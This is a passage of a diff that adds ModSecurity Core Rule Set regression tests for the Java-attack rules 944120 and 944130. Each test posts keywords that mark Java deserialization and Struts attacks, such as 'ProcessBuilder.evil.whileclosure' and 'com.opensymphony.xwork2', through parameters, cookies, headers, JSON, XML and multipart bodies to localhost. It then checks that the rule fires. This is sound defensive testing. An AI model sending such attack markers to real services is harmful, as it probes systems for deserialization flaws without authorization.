Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-103 + desc: "Argument name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-104 + desc: "Cookie test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-105 + desc: "Cookie name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.prototypeserializationfactory=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-106 + desc: "Request header test includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.prototypeserializationfactory + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-107 + desc: "XML element includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-108 + desc: "XML attribute name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-109 + desc: "XML attribute value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-110 + desc: "XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-111 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-112 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.prototypeserializationfactory" + output: + log_contains: "id \"944120\"" + - test_title: 944120-113 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.prototypeserializationfactory\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-114 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.prototypeserializationfactory\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-115 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-116 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; 
boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.prototypeserializationfactory": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-117 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-118 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.prototypeserializationfactory" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + 
-----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.prototypeserializationfactory + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-119 + desc: "Argument test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-120 + desc: "Argument name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure=test" + output: + log_contains: "id \"944120\"" + - test_title: 944120-121 + desc: "Cookie test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-122 + desc: "Cookie name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.whileclosure=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-123 + desc: "Request header test includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.whileclosure + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-124 + desc: "XML element includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-125 + desc: "XML attribute name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944120\"" + - test_title: 944120-126 + desc: "XML attribute value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944120\"" + - test_title: 944120-127 + desc: "XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: 
"ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-128 + desc: "Nested XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-129 + desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.whileclosure" + output: + log_contains: "id \"944120\"" + - test_title: 944120-130 + desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.whileclosure\"}" + output: + 
log_contains: "id \"944120\"" + - test_title: 944120-131 + desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.whileclosure\": \"test\"}" + output: + log_contains: "id \"944120\"" + - test_title: 944120-132 + desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-133 + desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json + + {"ProcessBuilder.evil.whileclosure": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-134 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" + - test_title: 944120-135 + desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.whileclosure" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; 
boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml + + ProcessBuilder.evil.whileclosure + -----------------------------thisissparta-- + output: + log_contains: "id \"944120\"" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml new file mode 100644 index 000000000..defef163c --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml 
@@ -0,0 +1,8481 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944130.yaml" + description: "Positive tests for rule 944130" +tests: + - test_title: 944130-0 + desc: "Argument test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-1 + desc: "Argument name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-2 + desc: "Cookie test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" 
+ data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-3 + desc: "Cookie name includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: com.opensymphony.xwork2=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-4 + desc: "Request header test includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: com.opensymphony.xwork2 + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-5 + desc: "XML attribute value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-6 + 
desc: "XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-7 + desc: "Nested XML element value includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "com.opensymphony.xwork2" + output: + log_contains: "id \"944130\"" + - test_title: 944130-8 + desc: "Content-Type text/plain includes keyword com.opensymphony.xwork2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "ModSecurity CRS 3 Tests" + Accept: 